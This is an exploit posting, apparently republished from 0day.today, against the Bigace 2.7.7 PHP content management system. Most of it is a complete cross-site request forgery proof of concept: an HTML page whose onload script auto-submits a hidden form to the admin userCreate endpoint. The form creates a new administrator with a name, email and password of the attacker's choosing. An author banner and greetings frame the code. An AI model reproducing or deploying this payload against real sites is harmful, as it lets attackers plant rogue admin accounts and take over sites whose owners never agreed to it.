Bigace 2.7.7 <= CSRF add admin

<======================================================>
    [»]  Bigace 2.7.7 <= CSRF add admin 
<======================================================>  
     [»]  ---> Date :     29- 03- 2012             
     [»]  ---> Author :    Expl0!Ts      
     [»]  ---> Software Link :  http://www.bigace.de/plugins/download/219-bigace_2.7.7.zip
     [»]  ---> Version:      2.7.7        
     [»]  ---> Category:  php             
     [»]  ---> Tested on:  wind xp & ubuntu 10.10
     [»]  ---> Dork : your mind  
<=======================================================>

!=> vuln p0c :  


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title> Bigace 2.7.7 <= CSRF add admin By : Expl0!Ts </title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "140","152" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 2;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<form method="POST" name="form1" action="http://127.0.0.1:80/bigace/public/index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create">
<input type="hidden" name="userName" value="Your new admin "/>
<input type="hidden" name="language" value="en"/>
<input type="hidden" name="state" value="1"/>
<input type="hidden" name="email" value=" Your email "/>
<input type="hidden" name="passwordnew" value=" Your new Pass "/>
<input type="hidden" name="passwordcheck" value="Your new Pass"/>
</form>
</body>
</html>

================================================================>
==> greatz : Damane2011 & BaC & black-id & robert m °0°...°0°
==> Thnks y0u : baset and merouane and abdllah my best freind 
================================================================>
EnJoY o_O



#  0day.today [2018-02-17]  #